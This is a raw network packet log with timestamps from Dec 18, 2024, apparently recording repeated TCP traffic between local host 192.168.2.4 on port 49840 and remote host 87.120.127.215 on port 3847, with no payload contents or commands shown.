                                                                                                                                                Dec 18, 2024 19:27:19.524638891 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.524729013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.524780035 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.525849104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.526036024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.526098013 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.528100967 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.528479099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.529153109 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.529309988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.529423952 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.529469013 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.530318022 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.530399084 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.530457020 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.531757116 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.531795979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.532598972 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.532634974 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.532655954 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.532685041 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.533565044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.533601999 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.533659935 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.534786940 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.534821987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.534878969 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.536040068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.536077023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.536134958 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.537148952 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.537237883 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.537296057 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.538367033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.538465023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.538631916 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.539477110 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.539598942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.540211916 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.540663004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.540734053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.540788889 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.541843891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.541944981 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.542151928 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.543184042 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.543220997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.544364929 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.544431925 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.544445992 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.544501066 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.545794964 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.545970917 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.546036005 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.547039986 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.547099113 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.548230886 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.548271894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.548306942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.548459053 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.550005913 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.550152063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.550209045 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.551167011 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.551369905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.551440954 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.552444935 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.552481890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.552534103 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.553577900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.553684950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.554172993 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.554738998 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.554853916 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.554943085 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.556019068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.556093931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.556149006 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.557656050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.557724953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.557770967 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.558376074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.558523893 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.558573008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.564189911 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564224958 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564260960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564296961 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564321041 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.564358950 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.564593077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564630032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564666986 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564686060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.564702988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564821005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564857960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.564872980 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.564912081 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.569216013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.569252968 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.569315910 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.570202112 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.570255995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.570311069 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.571422100 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.571599960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.572580099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.572617054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.572638035 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.572668076 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.574071884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.574107885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.574168921 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.575181961 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.575201988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.575222015 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.575238943 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.575257063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.575268984 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.575297117 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.628654957 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.702977896 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.703154087 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.703227997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.703641891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.703815937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.704917908 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.704981089 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.705071926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.705128908 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.706074953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.706270933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.706331968 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.707272053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.707308054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.707370996 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.708463907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.708640099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.708722115 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.709462881 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.709613085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.709677935 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.710728884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.710905075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.710972071 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.711713076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.711905956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.712116957 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.712958097 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.713148117 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.713205099 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.714098930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.714359999 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.715250969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.715301037 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.715441942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.715502024 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.716690063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.716727018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.716773033 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.717519999 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.717694044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.717753887 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.718842030 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.718878031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.718934059 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.719794989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.719830036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.719866037 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.719902039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.719914913 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.719949007 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.721587896 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.722189903 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.722245932 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.723401070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.723596096 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.724601030 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.724659920 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.724771023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.724828959 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.725718975 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.726063013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.726120949 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.727010012 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.727344036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.727395058 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.728279114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.728595972 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.728647947 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.729298115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.729336023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.729393959 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.730249882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.730426073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.730474949 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.731380939 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.731571913 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.732080936 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.732723951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.732889891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.732945919 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.733830929 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.733999968 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.734972000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.735022068 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.735307932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.735392094 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.736125946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.736438036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.736604929 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.737302065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.737456083 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.738426924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.738478899 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.738595009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.738642931 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.739713907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.739856005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.739911079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.740802050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.740839005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.741447926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.741890907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.741928101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.742069960 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.744105101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.744143009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.744246960 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.744739056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.744792938 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.744843006 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.745371103 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.745543957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.746246099 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.746531010 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.746691942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.746736050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.747662067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.747840881 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.747889996 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.748994112 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.749032021 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.749080896 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.749948978 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.750283957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.750334024 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.751266003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.751302004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.751445055 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.752439976 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.752495050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.753201008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.753458023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.753631115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.753693104 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.754648924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.754687071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.754753113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.755829096 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756006002 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756190062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756226063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756251097 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.756262064 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756272078 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.756299973 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.756989002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.759253979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.759290934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.760014057 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.760437012 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.760610104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.760674953 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.761662960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.762015104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.762073040 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.762654066 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.762830019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.763257027 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.763958931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.816211939 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.893063068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.893107891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.893187046 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.895836115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.895967960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.896049023 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.897057056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.897094011 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.897238970 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.897279024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.897303104 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.897334099 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.898364067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.898401022 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.898467064 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.899435997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.899475098 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.900609016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.900665998 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.900769949 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.900829077 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.901639938 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.901806116 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.901863098 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.902740002 CET38474984087.120.127.215192.168.2.4
